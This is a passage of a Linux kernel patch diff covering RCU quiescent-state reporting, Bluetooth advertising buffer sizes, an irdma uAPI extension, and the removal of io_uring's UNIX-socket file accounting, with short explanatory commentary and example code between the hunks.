++ * modifies its old_ts argument.
++ *
++ * Because regions of code that have disabled softirq act as RCU read-side
++ * critical sections, this macro should be invoked with softirq (and
++ * preemption) enabled.
++ *
++ * The macro is not needed when CONFIG_PREEMPT_RT is defined. RT kernels would
++ * have more chance to invoke schedule() calls and provide necessary quiescent
++ * states. As a contrast, calling cond_resched() only won't achieve the same
++ * effect because cond_resched() does not provide RCU-Tasks quiescent states.
++ */
++#define rcu_softirq_qs_periodic(old_ts) \
++do { \
++	if (!IS_ENABLED(CONFIG_PREEMPT_RT) && \
++	    time_after(jiffies, (old_ts) + HZ / 10)) { \
++		preempt_disable(); \
++		rcu_softirq_qs(); \
++		preempt_enable(); \
++		(old_ts) = jiffies; \
++	} \
++} while (0)
++
+ /*
+  * Infrastructure to implement the synchronize_() primitives in
+  * TREE_RCU and rcu_barrier_() primitives in TINY_RCU.
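
rcu_softirq_qs_periodic() is consumed later in this patch by cpu_map_kthread_run() (kernel/bpf/cpumap.c). Typical usage in a long-running polling loop, per the kernel-doc above (process_items() is a hypothetical work function):

	#include <linux/jiffies.h>
	#include <linux/kthread.h>
	#include <linux/rcupdate.h>
	#include <linux/sched.h>

	static int poll_thread(void *data)
	{
		unsigned long last_qs = jiffies;

		while (!kthread_should_stop()) {
			process_items(data);		/* hypothetical */
			/* report an RCU/RCU-Tasks QS at most every 100ms */
			rcu_softirq_qs_periodic(last_qs);
			cond_resched();
		}
		return 0;
	}
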
+diff --git a/include/net/bluetooth/hci.h b/include/net/bluetooth/hci.h
+index a674221d151db..c69e09909449f 100644
+--- a/include/net/bluetooth/hci.h
++++ b/include/net/bluetooth/hci.h
+@@ -416,7 +416,6 @@ enum {
+ #define HCI_NCMD_TIMEOUT	msecs_to_jiffies(4000)	/* 4 seconds */
+ #define HCI_ACL_TX_TIMEOUT	msecs_to_jiffies(45000)	/* 45 seconds */
+ #define HCI_AUTO_OFF_TIMEOUT	msecs_to_jiffies(2000)	/* 2 seconds */
+-#define HCI_POWER_OFF_TIMEOUT	msecs_to_jiffies(5000)	/* 5 seconds */
+ #define HCI_LE_CONN_TIMEOUT	msecs_to_jiffies(20000)	/* 20 seconds */
+ #define HCI_LE_AUTOCONN_TIMEOUT	msecs_to_jiffies(4000)	/* 4 seconds */
+ 
+diff --git a/include/net/bluetooth/hci_core.h b/include/net/bluetooth/hci_core.h
+index 09c978f3d95dc..c50a41f1782a4 100644
+--- a/include/net/bluetooth/hci_core.h
++++ b/include/net/bluetooth/hci_core.h
+@@ -81,7 +81,7 @@ struct discovery_state {
+ 	u8			last_adv_addr_type;
+ 	s8			last_adv_rssi;
+ 	u32			last_adv_flags;
+-	u8			last_adv_data[HCI_MAX_AD_LENGTH];
++	u8			last_adv_data[HCI_MAX_EXT_AD_LENGTH];
+ 	u8			last_adv_data_len;
+ 	bool			report_invalid_rssi;
+ 	bool			result_filtering;
+@@ -293,7 +293,7 @@ struct adv_pattern {
+ 	__u8 ad_type;
+ 	__u8 offset;
+ 	__u8 length;
+-	__u8 value[HCI_MAX_AD_LENGTH];
++	__u8 value[HCI_MAX_EXT_AD_LENGTH];
+ };
+ 
+ struct adv_rssi_thresholds {
+@@ -549,6 +549,7 @@ struct hci_dev {
+ 	__u32			req_status;
+ 	__u32			req_result;
+ 	struct sk_buff		*req_skb;
++	struct sk_buff		*req_rsp;
+ 
+ 	void			*smp_data;
+ 	void			*smp_bredr_data;
+@@ -726,7 +727,7 @@ struct hci_conn {
+ 	__u16		le_conn_interval;
+ 	__u16		le_conn_latency;
+ 	__u16		le_supv_timeout;
+-	__u8		le_adv_data[HCI_MAX_AD_LENGTH];
++	__u8		le_adv_data[HCI_MAX_EXT_AD_LENGTH];
+ 	__u8		le_adv_data_len;
+ 	__u8		le_per_adv_data[HCI_MAX_PER_AD_LENGTH];
+ 	__u8		le_per_adv_data_len;
+@@ -739,6 +740,7 @@ struct hci_conn {
+ 	unsigned long	flags;
+ 
+ 	enum conn_reasons conn_reason;
++	__u8		abort_reason;
+ 
+ 	__u32		clock;
+ 	__u16		clock_accuracy;
+@@ -758,7 +760,6 @@ struct hci_conn {
+ 	struct delayed_work auto_accept_work;
+ 	struct delayed_work idle_work;
+ 	struct delayed_work le_conn_timeout;
+-	struct work_struct  le_scan_cleanup;
+ 
+ 	struct device	dev;
+ 	struct dentry	*debugfs;
+@@ -1709,6 +1710,10 @@ void hci_conn_del_sysfs(struct hci_conn *conn);
+ /* Extended advertising support */
+ #define ext_adv_capable(dev) (((dev)->le_features[1] & HCI_LE_EXT_ADV))
+ 
++/* Maximum advertising length */
++#define max_adv_len(dev) \
++	(ext_adv_capable(dev) ? HCI_MAX_EXT_AD_LENGTH : HCI_MAX_AD_LENGTH)
++
+ /* BLUETOOTH CORE SPECIFICATION Version 5.3 | Vol 4, Part E page 1789:
+  *
+  * C24: Mandatory if the LE Controller supports Connection State and either
+diff --git a/include/net/bluetooth/hci_sync.h b/include/net/bluetooth/hci_sync.h
+index 17f5a4c32f36e..59d15b1a978ab 100644
+--- a/include/net/bluetooth/hci_sync.h
++++ b/include/net/bluetooth/hci_sync.h
+@@ -39,8 +39,10 @@ int __hci_cmd_sync_status_sk(struct hci_dev *hdev, u16 opcode, u32 plen,
+ void hci_cmd_sync_init(struct hci_dev *hdev);
+ void hci_cmd_sync_clear(struct hci_dev *hdev);
+ void hci_cmd_sync_cancel(struct hci_dev *hdev, int err);
+-void __hci_cmd_sync_cancel(struct hci_dev *hdev, int err);
++void hci_cmd_sync_cancel_sync(struct hci_dev *hdev, int err);
+ 
++int hci_cmd_sync_submit(struct hci_dev *hdev, hci_cmd_sync_work_func_t func,
++			void *data, hci_cmd_sync_work_destroy_t destroy);
+ int hci_cmd_sync_queue(struct hci_dev *hdev, hci_cmd_sync_work_func_t func,
+ 		       void *data, hci_cmd_sync_work_destroy_t destroy);
+ 
+diff --git a/include/uapi/rdma/irdma-abi.h b/include/uapi/rdma/irdma-abi.h
+index a7085e092d348..3a0cde4dcf331 100644
+--- a/include/uapi/rdma/irdma-abi.h
++++ b/include/uapi/rdma/irdma-abi.h
+@@ -22,10 +22,15 @@ enum irdma_memreg_type {
+ 	IRDMA_MEMREG_TYPE_CQ   = 2,
+ };
+ 
++enum {
++	IRDMA_ALLOC_UCTX_USE_RAW_ATTR = 1 << 0,
++};
++
+ struct irdma_alloc_ucontext_req {
+ 	__u32 rsvd32;
+ 	__u8 userspace_ver;
+ 	__u8 rsvd8[3];
++	__aligned_u64 comp_mask;
+ };
+ 
+ struct irdma_alloc_ucontext_resp {
+@@ -46,6 +51,7 @@ struct irdma_alloc_ucontext_resp {
+ 	__u16 max_hw_sq_chunk;
+ 	__u8 hw_rev;
+ 	__u8 rsvd2;
++	__aligned_u64 comp_mask;
+ };
+ 
+ struct irdma_alloc_pd_resp {
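
The irdma uAPI grows an __aligned_u64 comp_mask in both the alloc_ucontext request and response; each bit advertises an optional extension, with IRDMA_ALLOC_UCTX_USE_RAW_ATTR as the first. Old userspace passes a shorter struct or a zero mask and keeps the legacy behaviour. A fragment sketching how the driver side of such a handshake might look, assuming a min()-bounded udata copy into a zero-initialized request (use_raw_attrs is an illustrative field name, not taken from this patch):

	struct irdma_alloc_ucontext_req req = {};

	if (ib_copy_from_udata(&req, udata, min(udata->inlen, sizeof(req))))
		return -EFAULT;

	if (req.comp_mask & IRDMA_ALLOC_UCTX_USE_RAW_ATTR)
		ucontext->use_raw_attrs = true;	/* illustrative */
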
+diff --git a/init/main.c b/init/main.c
+index 87a52bdb41d67..ccde19e7275fa 100644
+--- a/init/main.c
++++ b/init/main.c
+@@ -89,6 +89,7 @@
+ #include <linux/sched/task_stack.h>
+ #include <linux/context_tracking.h>
+ #include <linux/random.h>
++#include <linux/moduleloader.h>
+ #include <linux/list.h>
+ #include <linux/integrity.h>
+ #include <linux/proc_ns.h>
+@@ -1473,11 +1474,11 @@ static void mark_readonly(void)
+ 	if (rodata_enabled) {
+ 		/*
+ 		 * load_module() results in W+X mappings, which are cleaned
+-		 * up with call_rcu().  Let's make sure that queued work is
++		 * up with init_free_wq. Let's make sure that queued work is
+ 		 * flushed so that we don't hit false positives looking for
+ 		 * insecure pages which are W+X.
+ 		 */
+-		rcu_barrier();
++		flush_module_init_free_work();
+ 		mark_rodata_ro();
+ 		rodata_test();
+ 	} else
+diff --git a/io_uring/filetable.c b/io_uring/filetable.c
+index b80614e7d6051..4660cb89ea9f5 100644
+--- a/io_uring/filetable.c
++++ b/io_uring/filetable.c
+@@ -95,12 +95,10 @@ static int io_install_fixed_file(struct io_ring_ctx *ctx, struct file *file,
+ 		needs_switch = true;
+ 	}
+ 
+-	ret = io_scm_file_account(ctx, file);
+-	if (!ret) {
+-		*io_get_tag_slot(ctx->file_data, slot_index) = 0;
+-		io_fixed_file_set(file_slot, file);
+-		io_file_bitmap_set(&ctx->file_table, slot_index);
+-	}
++	*io_get_tag_slot(ctx->file_data, slot_index) = 0;
++	io_fixed_file_set(file_slot, file);
++	io_file_bitmap_set(&ctx->file_table, slot_index);
++	return 0;
+ err:
+ 	if (needs_switch)
+ 		io_rsrc_node_switch(ctx, ctx->file_data);
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index 35894955b4549..415248c1f82c6 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -60,7 +60,6 @@
+ #include <linux/net.h>
+ #include <net/sock.h>
+ #include <net/af_unix.h>
+-#include <net/scm.h>
+ #include <linux/anon_inodes.h>
+ #include <linux/sched/mm.h>
+ #include <linux/uaccess.h>
+@@ -153,19 +152,6 @@ static void __io_submit_flush_completions(struct io_ring_ctx *ctx);
+ 
+ static struct kmem_cache *req_cachep;
+ 
+-struct sock *io_uring_get_socket(struct file *file)
+-{
+-#if defined(CONFIG_UNIX)
+-	if (io_is_uring_fops(file)) {
+-		struct io_ring_ctx *ctx = file->private_data;
+-
+-		return ctx->ring_sock->sk;
+-	}
+-#endif
+-	return NULL;
+-}
+-EXPORT_SYMBOL(io_uring_get_socket);
+-
+ static inline void io_submit_flush_completions(struct io_ring_ctx *ctx)
+ {
+ 	if (!wq_list_empty(&ctx->submit_state.compl_reqs))
+@@ -2641,12 +2627,6 @@ static __cold void io_ring_ctx_free(struct io_ring_ctx *ctx)
+ 	WARN_ON_ONCE(!list_empty(&ctx->rsrc_ref_list));
+ 	WARN_ON_ONCE(!llist_empty(&ctx->rsrc_put_llist));
+ 
+-#if defined(CONFIG_UNIX)
+-	if (ctx->ring_sock) {
+-		ctx->ring_sock->file = NULL; /* so that iput() is called */
+-		sock_release(ctx->ring_sock);
+-	}
+-#endif
+ 	WARN_ON_ONCE(!list_empty(&ctx->ltimeout_list));
+ 
+ 	if (ctx->mm_account) {
+@@ -3451,32 +3431,12 @@ static int io_uring_install_fd(struct io_ring_ctx *ctx, struct file *file)
+ /*
+  * Allocate an anonymous fd, this is what constitutes the application
+  * visible backing of an io_uring instance. The application mmaps this
+- * fd to gain access to the SQ/CQ ring details. If UNIX sockets are enabled,
+- * we have to tie this fd to a socket for file garbage collection purposes.
++ * fd to gain access to the SQ/CQ ring details.
+  */
+ static struct file *io_uring_get_file(struct io_ring_ctx *ctx)
+ {
+-	struct file *file;
+-#if defined(CONFIG_UNIX)
+-	int ret;
+-
+-	ret = sock_create_kern(&init_net, PF_UNIX, SOCK_RAW, IPPROTO_IP,
+-				&ctx->ring_sock);
+-	if (ret)
+-		return ERR_PTR(ret);
+-#endif
+-
+-	file = anon_inode_getfile_secure("[io_uring]", &io_uring_fops, ctx,
++	return anon_inode_getfile_secure("[io_uring]", &io_uring_fops, ctx,
+ 					 O_RDWR | O_CLOEXEC, NULL);
+-#if defined(CONFIG_UNIX)
+-	if (IS_ERR(file)) {
+-		sock_release(ctx->ring_sock);
+-		ctx->ring_sock = NULL;
+-	} else {
+-		ctx->ring_sock->file = file;
+-	}
+-#endif
+-	return file;
+ }
+ 
+ static __cold int io_uring_create(unsigned entries, struct io_uring_params *p,
+diff --git a/io_uring/io_uring.h b/io_uring/io_uring.h
+index 019600570ee49..59e6f755f12c6 100644
+--- a/io_uring/io_uring.h
++++ b/io_uring/io_uring.h
+@@ -52,7 +52,6 @@ static inline bool io_req_ffs_set(struct io_kiocb *req)
+ }
+ 
+ void __io_req_task_work_add(struct io_kiocb *req, bool allow_local);
+-bool io_is_uring_fops(struct file *file);
+ bool io_alloc_async_data(struct io_kiocb *req);
+ void io_req_task_queue(struct io_kiocb *req);
+ void io_queue_iowq(struct io_kiocb *req, bool *dont_use);
+diff --git a/io_uring/net.c b/io_uring/net.c
+index c062ce66af12c..0d4ee3d738fbf 100644
+--- a/io_uring/net.c
++++ b/io_uring/net.c
+@@ -183,16 +183,115 @@ static int io_setup_async_msg(struct io_kiocb *req,
+ 	return -EAGAIN;
+ }
+ 
++#ifdef CONFIG_COMPAT
++static int io_compat_msg_copy_hdr(struct io_kiocb *req,
++				  struct io_async_msghdr *iomsg,
++				  struct compat_msghdr *msg, int ddir)
++{
++	struct io_sr_msg *sr = io_kiocb_to_cmd(req, struct io_sr_msg);
++	struct compat_iovec __user *uiov;
++	int ret;
++
++	if (copy_from_user(msg, sr->umsg_compat, sizeof(*msg)))
++		return -EFAULT;
++
++	uiov = compat_ptr(msg->msg_iov);
++	if (req->flags & REQ_F_BUFFER_SELECT) {
++		compat_ssize_t clen;
++
++		iomsg->free_iov = NULL;
++		if (msg->msg_iovlen == 0) {
++			sr->len = 0;
++		} else if (msg->msg_iovlen > 1) {
++			return -EINVAL;
++		} else {
++			if (!access_ok(uiov, sizeof(*uiov)))
++				return -EFAULT;
++			if (__get_user(clen, &uiov->iov_len))
++				return -EFAULT;
++			if (clen < 0)
++				return -EINVAL;
++			sr->len = clen;
++		}
++
++		return 0;
++	}
++
++	iomsg->free_iov = iomsg->fast_iov;
++	ret = __import_iovec(ddir, (struct iovec __user *)uiov, msg->msg_iovlen,
++				UIO_FASTIOV, &iomsg->free_iov,
++				&iomsg->msg.msg_iter, true);
++	if (unlikely(ret < 0))
++		return ret;
++
++	return 0;
++}
++#endif
++
++static int io_msg_copy_hdr(struct io_kiocb *req, struct io_async_msghdr *iomsg,
++			   struct user_msghdr *msg, int ddir)
++{
++	struct io_sr_msg *sr = io_kiocb_to_cmd(req, struct io_sr_msg);
++	int ret;
++
++	if (copy_from_user(msg, sr->umsg, sizeof(*sr->umsg)))
++		return -EFAULT;
++
++	if (req->flags & REQ_F_BUFFER_SELECT) {
++		if (msg->msg_iovlen == 0) {
++			sr->len = iomsg->fast_iov[0].iov_len = 0;
++			iomsg->fast_iov[0].iov_base = NULL;
++			iomsg->free_iov = NULL;
++		} else if (msg->msg_iovlen > 1) {
++			return -EINVAL;
++		} else {
++			if (copy_from_user(iomsg->fast_iov, msg->msg_iov,
++					   sizeof(*msg->msg_iov)))
++				return -EFAULT;
++			sr->len = iomsg->fast_iov[0].iov_len;
++			iomsg->free_iov = NULL;
++		}
++
++		return 0;
++	}
++
++	iomsg->free_iov = iomsg->fast_iov;
++	ret = __import_iovec(ddir, msg->msg_iov, msg->msg_iovlen, UIO_FASTIOV,
++				&iomsg->free_iov, &iomsg->msg.msg_iter, false);
++	if (unlikely(ret < 0))
++		return ret;
++
++	return 0;
++}
++
+ static int io_sendmsg_copy_hdr(struct io_kiocb *req,
+ 			       struct io_async_msghdr *iomsg)
+ {
+ 	struct io_sr_msg *sr = io_kiocb_to_cmd(req, struct io_sr_msg);
++	struct user_msghdr msg;
+ 	int ret;
+ 
+ 	iomsg->msg.msg_name = &iomsg->addr;
+-	iomsg->free_iov = iomsg->fast_iov;
+-	ret = sendmsg_copy_msghdr(&iomsg->msg, sr->umsg, sr->msg_flags,
+-					&iomsg->free_iov);
++	iomsg->msg.msg_iter.nr_segs = 0;
++
++#ifdef CONFIG_COMPAT
++	if (unlikely(req->ctx->compat)) {
++		struct compat_msghdr cmsg;
++
++		ret = io_compat_msg_copy_hdr(req, iomsg, &cmsg, ITER_SOURCE);
++		if (unlikely(ret))
++			return ret;
++
++		return __get_compat_msghdr(&iomsg->msg, &cmsg, NULL);
++	}
++#endif
++
++	ret = io_msg_copy_hdr(req, iomsg, &msg, ITER_SOURCE);
++	if (unlikely(ret))
++		return ret;
++
++	ret = __copy_msghdr(&iomsg->msg, &msg, NULL);
++
+ 	/* save msg_control as sys_sendmsg() overwrites it */
+ 	sr->msg_control = iomsg->msg.msg_control_user;
+ 	return ret;
+@@ -415,142 +514,77 @@ int io_send(struct io_kiocb *req, unsigned int issue_flags)
+ 	return IOU_OK;
+ }
+ 
+-static bool io_recvmsg_multishot_overflow(struct io_async_msghdr *iomsg)
++static int io_recvmsg_mshot_prep(struct io_kiocb *req,
++				 struct io_async_msghdr *iomsg,
++				 int namelen, size_t controllen)
+ {
+-	int hdr;
+-
+-	if (iomsg->namelen < 0)
+-		return true;
+-	if (check_add_overflow((int)sizeof(struct io_uring_recvmsg_out),
+-			       iomsg->namelen, &hdr))
+-		return true;
+-	if (check_add_overflow(hdr, (int)iomsg->controllen, &hdr))
+-		return true;
++	if ((req->flags & (REQ_F_APOLL_MULTISHOT|REQ_F_BUFFER_SELECT)) ==
++			  (REQ_F_APOLL_MULTISHOT|REQ_F_BUFFER_SELECT)) {
++		int hdr;
++
++		if (unlikely(namelen < 0))
++			return -EOVERFLOW;
++		if (check_add_overflow(sizeof(struct io_uring_recvmsg_out),
++					namelen, &hdr))
++			return -EOVERFLOW;
++		if (check_add_overflow(hdr, controllen, &hdr))
++			return -EOVERFLOW;
++
++		iomsg->namelen = namelen;
++		iomsg->controllen = controllen;
++		return 0;
++	}
+ 
+-	return false;
++	return 0;
+ }
+ 
+-static int __io_recvmsg_copy_hdr(struct io_kiocb *req,
+-				 struct io_async_msghdr *iomsg)
++static int io_recvmsg_copy_hdr(struct io_kiocb *req,
++			       struct io_async_msghdr *iomsg)
+ {
+-	struct io_sr_msg *sr = io_kiocb_to_cmd(req, struct io_sr_msg);
+ 	struct user_msghdr msg;
+ 	int ret;
+ 
+-	if (copy_from_user(&msg, sr->umsg, sizeof(*sr->umsg)))
+-		return -EFAULT;
+-
+-	ret = __copy_msghdr(&iomsg->msg, &msg, &iomsg->uaddr);
+-	if (ret)
+-		return ret;
+-
+-	if (req->flags & REQ_F_BUFFER_SELECT) {
+-		if (msg.msg_iovlen == 0) {
+-			sr->len = iomsg->fast_iov[0].iov_len = 0;
+-			iomsg->fast_iov[0].iov_base = NULL;
+-			iomsg->free_iov = NULL;
+-		} else if (msg.msg_iovlen > 1) {
+-			return -EINVAL;
+-		} else {
+-			if (copy_from_user(iomsg->fast_iov, msg.msg_iov, sizeof(*msg.msg_iov)))
+-				return -EFAULT;
+-			sr->len = iomsg->fast_iov[0].iov_len;
+-			iomsg->free_iov = NULL;
+-		}
+-
+-		if (req->flags & REQ_F_APOLL_MULTISHOT) {
+-			iomsg->namelen = msg.msg_namelen;
+-			iomsg->controllen = msg.msg_controllen;
+-			if (io_recvmsg_multishot_overflow(iomsg))
+-				return -EOVERFLOW;
+-		}
+-	} else {
+-		iomsg->free_iov = iomsg->fast_iov;
+-		ret = __import_iovec(ITER_DEST, msg.msg_iov, msg.msg_iovlen, UIO_FASTIOV,
+-				     &iomsg->free_iov, &iomsg->msg.msg_iter,
+-				     false);
+-		if (ret > 0)
+-			ret = 0;
+-	}
+-
+-	return ret;
+-}
++	iomsg->msg.msg_name = &iomsg->addr;
++	iomsg->msg.msg_iter.nr_segs = 0;
+ 
+ #ifdef CONFIG_COMPAT
+-static int __io_compat_recvmsg_copy_hdr(struct io_kiocb *req,
+-					struct io_async_msghdr *iomsg)
+-{
+-	struct io_sr_msg *sr = io_kiocb_to_cmd(req, struct io_sr_msg);
+-	struct compat_msghdr msg;
+-	struct compat_iovec __user *uiov;
+-	int ret;
+-
+-	if (copy_from_user(&msg, sr->umsg_compat, sizeof(msg)))
+-		return -EFAULT;
+-
+-	ret = __get_compat_msghdr(&iomsg->msg, &msg, &iomsg->uaddr);
+-	if (ret)
+-		return ret;
++	if (unlikely(req->ctx->compat)) {
++		struct compat_msghdr cmsg;
+ 
+-	uiov = compat_ptr(msg.msg_iov);
+-	if (req->flags & REQ_F_BUFFER_SELECT) {
+-		compat_ssize_t clen;
+-
+-		iomsg->free_iov = NULL;
+-		if (msg.msg_iovlen == 0) {
+-			sr->len = 0;
+-		} else if (msg.msg_iovlen > 1) {
+-			return -EINVAL;
+-		} else {
+-			if (!access_ok(uiov, sizeof(*uiov)))
+-				return -EFAULT;
+-			if (__get_user(clen, &uiov->iov_len))
+-				return -EFAULT;
+-			if (clen < 0)
+-				return -EINVAL;
+-			sr->len = clen;
+-		}
++		ret = io_compat_msg_copy_hdr(req, iomsg, &cmsg, ITER_DEST);
++		if (unlikely(ret))
++			return ret;
+ 
+-		if (req->flags & REQ_F_APOLL_MULTISHOT) {
+-			iomsg->namelen = msg.msg_namelen;
+-			iomsg->controllen = msg.msg_controllen;
+-			if (io_recvmsg_multishot_overflow(iomsg))
+-				return -EOVERFLOW;
+-		}
+-	} else {
+-		iomsg->free_iov = iomsg->fast_iov;
+-		ret = __import_iovec(ITER_DEST, (struct iovec __user *)uiov, msg.msg_iovlen,
+-				   UIO_FASTIOV, &iomsg->free_iov,
+-				   &iomsg->msg.msg_iter, true);
+-		if (ret < 0)
++		ret = __get_compat_msghdr(&iomsg->msg, &cmsg, &iomsg->uaddr);
++		if (unlikely(ret))
+ 			return ret;
+-	}
+ 
+-	return 0;
+-}
++		return io_recvmsg_mshot_prep(req, iomsg, cmsg.msg_namelen,
++						cmsg.msg_controllen);
++	}
+ #endif
+ 
+-static int io_recvmsg_copy_hdr(struct io_kiocb *req,
+-			       struct io_async_msghdr *iomsg)
+-{
+-	iomsg->msg.msg_name = &iomsg->addr;
+-	iomsg->msg.msg_iter.nr_segs = 0;
++	ret = io_msg_copy_hdr(req, iomsg, &msg, ITER_DEST);
++	if (unlikely(ret))
++		return ret;
+ 
+-#ifdef CONFIG_COMPAT
+-	if (req->ctx->compat)
+-		return __io_compat_recvmsg_copy_hdr(req, iomsg);
+-#endif
++	ret = __copy_msghdr(&iomsg->msg, &msg, &iomsg->uaddr);
++	if (unlikely(ret))
++		return ret;
+ 
+-	return __io_recvmsg_copy_hdr(req, iomsg);
++	return io_recvmsg_mshot_prep(req, iomsg, msg.msg_namelen,
++					msg.msg_controllen);
+ }
+ 
+ int io_recvmsg_prep_async(struct io_kiocb *req)
+ {
++	struct io_async_msghdr *iomsg;
+ 	int ret;
+ 
+ 	if (!io_msg_alloc_async_prep(req))
+ 		return -ENOMEM;
+-	ret = io_recvmsg_copy_hdr(req, req->async_data);
++	iomsg = req->async_data;
++	ret = io_recvmsg_copy_hdr(req, iomsg);
+ 	if (!ret)
+ 		req->flags |= REQ_F_NEED_CLEANUP;
+ 	return ret;
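
The refactored recvmsg path folds the old io_recvmsg_multishot_overflow() into io_recvmsg_mshot_prep(), which uses check_add_overflow() to verify that the io_uring_recvmsg_out header plus the name and control lengths fit in an int before those lengths are trusted. The pattern in isolation (a sketch; mixed int/size_t operands are fine because the builtin checks the exact sum against the destination type):

	#include <linux/overflow.h>

	/* Total bytes needed, or -EOVERFLOW if the sum wraps an int. */
	static int mshot_hdr_len(int fixed, int namelen, size_t controllen)
	{
		int sum;

		if (namelen < 0)
			return -EOVERFLOW;
		if (check_add_overflow(fixed, namelen, &sum))
			return -EOVERFLOW;
		if (check_add_overflow(sum, controllen, &sum))
			return -EOVERFLOW;
		return sum;
	}
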
+diff --git a/io_uring/rsrc.c b/io_uring/rsrc.c
+index 7ada0339b3870..ac658cfa89c63 100644
+--- a/io_uring/rsrc.c
++++ b/io_uring/rsrc.c
+@@ -494,11 +494,6 @@ static int __io_sqe_files_update(struct io_ring_ctx *ctx,
+ 				err = -EBADF;
+ 				break;
+ 			}
+-			err = io_scm_file_account(ctx, file);
+-			if (err) {
+-				fput(file);
+-				break;
+-			}
+ 			*io_get_tag_slot(data, i) = tag;
+ 			io_fixed_file_set(file_slot, file);
+ 			io_file_bitmap_set(&ctx->file_table, i);
+@@ -762,22 +757,12 @@ void __io_sqe_files_unregister(struct io_ring_ctx *ctx)
+ 	for (i = 0; i < ctx->nr_user_files; i++) {
+ 		struct file *file = io_file_from_index(&ctx->file_table, i);
+ 
+-		/* skip scm accounted files, they'll be freed by ->ring_sock */
+-		if (!file || io_file_need_scm(file))
++		if (!file)
+ 			continue;
+ 		io_file_bitmap_clear(&ctx->file_table, i);
+ 		fput(file);
+ 	}
+ 
+-#if defined(CONFIG_UNIX)
+-	if (ctx->ring_sock) {
+-		struct sock *sock = ctx->ring_sock->sk;
+-		struct sk_buff *skb;
+-
+-		while ((skb = skb_dequeue(&sock->sk_receive_queue)) != NULL)
+-			kfree_skb(skb);
+-	}
+-#endif
+ 	io_free_file_tables(&ctx->file_table);
+ 	io_file_table_set_alloc_range(ctx, 0, 0);
+ 	io_rsrc_data_free(ctx->file_data);
+@@ -805,134 +790,11 @@ int io_sqe_files_unregister(struct io_ring_ctx *ctx)
+ 	return ret;
+ }
+ 
+-/*
+- * Ensure the UNIX gc is aware of our file set, so we are certain that
+- * the io_uring can be safely unregistered on process exit, even if we have
+- * loops in the file referencing. We account only files that can hold other
+- * files because otherwise they can't form a loop and so are not interesting
+- * for GC.
+- */
+-int __io_scm_file_account(struct io_ring_ctx *ctx, struct file *file)
+-{
+-#if defined(CONFIG_UNIX)
+-	struct sock *sk = ctx->ring_sock->sk;
+-	struct sk_buff_head *head = &sk->sk_receive_queue;
+-	struct scm_fp_list *fpl;
+-	struct sk_buff *skb;
+-
+-	if (likely(!io_file_need_scm(file)))
+-		return 0;
+-
+-	/*
+-	 * See if we can merge this file into an existing skb SCM_RIGHTS
+-	 * file set. If there's no room, fall back to allocating a new skb
+-	 * and filling it in.
+-	 */
+-	spin_lock_irq(&head->lock);
+-	skb = skb_peek(head);
+-	if (skb && UNIXCB(skb).fp->count < SCM_MAX_FD)
+-		__skb_unlink(skb, head);
+-	else
+-		skb = NULL;
+-	spin_unlock_irq(&head->lock);
+-
+-	if (!skb) {
+-		fpl = kzalloc(sizeof(*fpl), GFP_KERNEL);
+-		if (!fpl)
+-			return -ENOMEM;
+-
+-		skb = alloc_skb(0, GFP_KERNEL);
+-		if (!skb) {
+-			kfree(fpl);
+-			return -ENOMEM;
+-		}
+-
+-		fpl->user = get_uid(current_user());
+-		fpl->max = SCM_MAX_FD;
+-		fpl->count = 0;
+-
+-		UNIXCB(skb).fp = fpl;
+-		skb->sk = sk;
+-		skb->scm_io_uring = 1;
+-		skb->destructor = unix_destruct_scm;
+-		refcount_add(skb->truesize, &sk->sk_wmem_alloc);
+-	}
+-
+-	fpl = UNIXCB(skb).fp;
+-	fpl->fp[fpl->count++] = get_file(file);
+-	unix_inflight(fpl->user, file);
+-	skb_queue_head(head, skb);
+-	fput(file);
+-#endif
+-	return 0;
+-}
+-
+ static void io_rsrc_file_put(struct io_ring_ctx *ctx, struct io_rsrc_put *prsrc)
+ {
+ 	struct file *file = prsrc->file;
+-#if defined(CONFIG_UNIX)
+-	struct sock *sock = ctx->ring_sock->sk;
+-	struct sk_buff_head list, *head = &sock->sk_receive_queue;
+-	struct sk_buff *skb;
+-	int i;
+-
+-	if (!io_file_need_scm(file)) {
+-		fput(file);
+-		return;
+-	}
+-
+-	__skb_queue_head_init(&list);
+-
+-	/*
+-	 * Find the skb that holds this file in its SCM_RIGHTS. When found,
+-	 * remove this entry and rearrange the file array.
+-	 */
+-	skb = skb_dequeue(head);
+-	while (skb) {
+-		struct scm_fp_list *fp;
+ 
+-		fp = UNIXCB(skb).fp;
+-		for (i = 0; i < fp->count; i++) {
+-			int left;
+-
+-			if (fp->fp[i] != file)
+-				continue;
+-
+-			unix_notinflight(fp->user, fp->fp[i]);
+-			left = fp->count - 1 - i;
+-			if (left) {
+-				memmove(&fp->fp[i], &fp->fp[i + 1],
+-						left * sizeof(struct file *));
+-			}
+-			fp->count--;
+-			if (!fp->count) {
+-				kfree_skb(skb);
+-				skb = NULL;
+-			} else {
+-				__skb_queue_tail(&list, skb);
+-			}
+-			fput(file);
+-			file = NULL;
+-			break;
+-		}
+-
+-		if (!file)
+-			break;
+-
+-		__skb_queue_tail(&list, skb);
+-
+-		skb = skb_dequeue(head);
+-	}
+-
+-	if (skb_peek(&list)) {
+-		spin_lock_irq(&head->lock);
+-		while ((skb = __skb_dequeue(&list)) != NULL)
+-			__skb_queue_tail(head, skb);
+-		spin_unlock_irq(&head->lock);
+-	}
+-#else
+ 	fput(file);
+-#endif
+ }
+ 
+ int io_sqe_files_register(struct io_ring_ctx *ctx, void __user *arg,
+@@ -986,21 +848,12 @@ int io_sqe_files_register(struct io_ring_ctx *ctx, void __user *arg,
+ 			goto fail;
+ 
+ 		/*
+-		 * Don't allow io_uring instances to be registered. If UNIX
+-		 * isn't enabled, then this causes a reference cycle and this
+-		 * instance can never get freed. If UNIX is enabled we'll
+-		 * handle it just fine, but there's still no point in allowing
+-		 * a ring fd as it doesn't support regular read/write anyway.
++		 * Don't allow io_uring instances to be registered.
+ 		 */
+ 		if (io_is_uring_fops(file)) {
+ 			fput(file);
+ 			goto fail;
+ 		}
+-		ret = io_scm_file_account(ctx, file);
+-		if (ret) {
+-			fput(file);
+-			goto fail;
+-		}
+ 		file_slot = io_fixed_file_slot(&ctx->file_table, i);
+ 		io_fixed_file_set(file_slot, file);
+ 		io_file_bitmap_set(&ctx->file_table, i);
+diff --git a/io_uring/rsrc.h b/io_uring/rsrc.h
+index acaf8dad05401..85f145607c620 100644
+--- a/io_uring/rsrc.h
++++ b/io_uring/rsrc.h
+@@ -77,21 +77,6 @@ int io_sqe_files_unregister(struct io_ring_ctx *ctx);
